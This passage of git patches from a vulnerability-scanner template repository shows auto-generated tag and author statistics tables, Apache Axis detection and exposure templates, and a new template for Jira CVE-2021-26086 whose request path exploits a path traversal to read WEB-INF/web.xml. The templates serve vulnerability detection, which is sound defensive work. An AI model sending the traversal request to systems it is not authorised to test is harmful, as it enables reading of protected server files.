+| tpshop | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| getsimple | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | | wooyun | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | | extractor | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| axis | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| linux | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| ilo | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| cacti | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| aruba | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| commax | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | | dvr | 1 | | | | | | | | | | plugin | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | | jnoj | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| qdpm | 1 | | | | | | | | | -| sar2html | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | | cyberoam | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| glpi | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| ec2 | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| logontracer | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| tectuus | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| phpfastcache | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| websvn | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| solarlog | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| adb | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| exposures | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| aruba | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| cofax | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| miscrsoft | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| camera | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | | netgenie | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| qcubed | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | | idemia | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| prestashop | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index affcdde18b..9516a71bfa 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 | -| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 | -| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 | -| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 | -| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | | -| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | | -| rce | 189 | gy741 | 71 | takeovers | 71 | | | | | +| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 | +| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 | +| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 | +| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 | +| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | | +| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | +| rce | 189 | gy741 | 72 | takeovers | 71 | | | | | | cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | | -| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | | -| cve2021 | 103 | pussycat0x | 42 | workflows | 35 | | | | | +| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | | +| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | | From e4f918b7472f2d6edf833e62a83c6168e20a5aca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 25 Aug 2021 23:11:49 +0000 Subject: [PATCH 46/52] Auto Update README [Wed Aug 25 23:11:49 UTC 2021] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index fba79152e9..ee37e1923f 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 624 | pikpikcu | 243 | cves | 631 | info | 592 | http | 1785 | -| panel | 222 | dhiyaneshdk | 240 | vulnerabilities | 281 | high | 504 | file | 46 | -| xss | 221 | pdteam | 196 | exposed-panels | 225 | medium | 398 | network | 38 | -| exposure | 212 | daffainfo | 160 | exposures | 182 | critical | 230 | dns | 11 | -| wordpress | 203 | geeknik | 149 | technologies | 160 | low | 161 | | | -| lfi | 203 | dwisiswant0 | 131 | misconfiguration | 125 | | | | | -| rce | 189 | gy741 | 71 | takeovers | 71 | | | | | +| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 | +| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 | +| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 | +| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 | +| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | | +| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | +| rce | 189 | gy741 | 72 | takeovers | 71 | | | | | | cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | | -| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | | -| cve2021 | 103 | pussycat0x | 42 | workflows | 35 | | | | | +| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | | +| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | | -**146 directories, 1940 files**. +**146 directories, 1962 files**. From 37695801355bb9c5b888509812e9698d783c725f Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 04:48:40 +0530 Subject: [PATCH 47/52] misc update --- dns/can-i-take-over-dns.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dns/can-i-take-over-dns.yaml b/dns/can-i-take-over-dns.yaml index 0c2c3d7052..fb4f8b6520 100644 --- a/dns/can-i-take-over-dns.yaml +++ b/dns/can-i-take-over-dns.yaml @@ -1,4 +1,4 @@ -id: can-i-take-over-dns +id: can-i-take-over-dns-fingerprint info: name: Can I Take Over DNS - Fingerprint From 1685ce08b024b6e575afee33ffbd6c6b69b20211 Mon Sep 17 00:00:00 2001 From: Douglas Santos Date: Thu, 26 Aug 2021 02:11:02 +0000 Subject: [PATCH 48/52] Apache Axis 1 and 2 templates --- .../files/axis-happyaxis-disclosure.yaml | 27 +++++++++++++++++ technologies/apache-axis-detect.yaml | 29 +++++++++++++++++++ 2 files changed, 56 insertions(+) create mode 100644 exposures/files/axis-happyaxis-disclosure.yaml create mode 100644 technologies/apache-axis-detect.yaml diff --git a/exposures/files/axis-happyaxis-disclosure.yaml b/exposures/files/axis-happyaxis-disclosure.yaml new file mode 100644 index 0000000000..583eac2cef --- /dev/null +++ b/exposures/files/axis-happyaxis-disclosure.yaml @@ -0,0 +1,27 @@ +id: axis-happyaxis-disclosure + +info: + name: axis-happyaxis-disclosure + author: dogasantos + severity: info + tags: axis,axis2,middleware + +requests: + - method: GET + path: + - "{{BaseURL}}/axis2/axis2-web/HappyAxis.jsp" + - "{{BaseURL}}/axis/happyaxis.jsp" + - "{{BaseURL}}/axis2-web/HappyAxis.jsp" + - "{{BaseURL}}/happyaxis.jsp" + matchers-condition: and + matchers: + - type: word + words: + - "Axis Happiness Page" + - "Axis2 Happiness Page" + - "java.vendor" + - "Examining Application Server" + condition: or + - type: status + status: + - 200 diff --git a/technologies/apache-axis-detect.yaml b/technologies/apache-axis-detect.yaml new file mode 100644 index 0000000000..03a5506ec6 --- /dev/null +++ b/technologies/apache-axis-detect.yaml @@ -0,0 +1,29 @@ +id: apache-axis-detect + +info: + name: apache-axis-detect + author: dogasantos + severity: info + description: Axis and Axis2 detection + tags: axis2,middleware + +requests: + - method: GET + path: + - "{{BaseURL}}/axis2/" + - "{{BaseURL}}/axis/" + - "{{BaseURL}}/" + matchers-condition: and + matchers: + - type: word + words: + - "Validate" + - "Welcome" + - "Axis" + - "deployed" + - "installation" + - "Admin" + condition: and + - type: status + status: + - 200 From 7a468632dcb9e656adc83f32047dd61732b12870 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?B=C3=B9i=20=C4=90=E1=BA=A1i=20Gia?= Date: Thu, 26 Aug 2021 10:45:56 +0700 Subject: [PATCH 49/52] Create CVE-2021-26086.yaml --- cves/2021/CVE-2021-26086.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2021/CVE-2021-26086.yaml diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml new file mode 100644 index 0000000000..b92aada5f3 --- /dev/null +++ b/cves/2021/CVE-2021-26086.yaml @@ -0,0 +1,26 @@ +id: CVE-2021-26086 + +info: + name: Jira Limited Remote File Read + author: cocxanh + severity: medium + description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. + reference: | + - https://jira.atlassian.com/browse/JRASERVER-72695 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26086 + tags: cve,cve2021,jira,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/s/xxx/_/;/WEB-INF/web.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "JiraImportProgressFilter" + part: body From 39ce8ee5b2b59c628b5cc9815fd994af2ea87f6a Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 26 Aug 2021 15:03:35 +0530 Subject: [PATCH 50/52] misc updates --- ...-happyaxis-disclosure.yaml => axis-happyaxis.yaml} | 11 +++++++---- technologies/apache-axis-detect.yaml | 6 ++++-- 2 files changed, 11 insertions(+), 6 deletions(-) rename exposures/files/{axis-happyaxis-disclosure.yaml => axis-happyaxis.yaml} (74%) diff --git a/exposures/files/axis-happyaxis-disclosure.yaml b/exposures/files/axis-happyaxis.yaml similarity index 74% rename from exposures/files/axis-happyaxis-disclosure.yaml rename to exposures/files/axis-happyaxis.yaml index 583eac2cef..193c3d184f 100644 --- a/exposures/files/axis-happyaxis-disclosure.yaml +++ b/exposures/files/axis-happyaxis.yaml @@ -1,10 +1,10 @@ -id: axis-happyaxis-disclosure +id: axis-happyaxis info: - name: axis-happyaxis-disclosure + name: Axis Happyaxis Exposure author: dogasantos severity: info - tags: axis,axis2,middleware + tags: axis,axis2,middleware,exposure,apache requests: - method: GET @@ -13,15 +13,18 @@ requests: - "{{BaseURL}}/axis/happyaxis.jsp" - "{{BaseURL}}/axis2-web/HappyAxis.jsp" - "{{BaseURL}}/happyaxis.jsp" + matchers-condition: and matchers: - type: word words: - "Axis Happiness Page" - "Axis2 Happiness Page" - - "java.vendor" - "Examining Application Server" + - "Examining Version Service" + - "Examining System Properties" condition: or + - type: status status: - 200 diff --git a/technologies/apache-axis-detect.yaml b/technologies/apache-axis-detect.yaml index 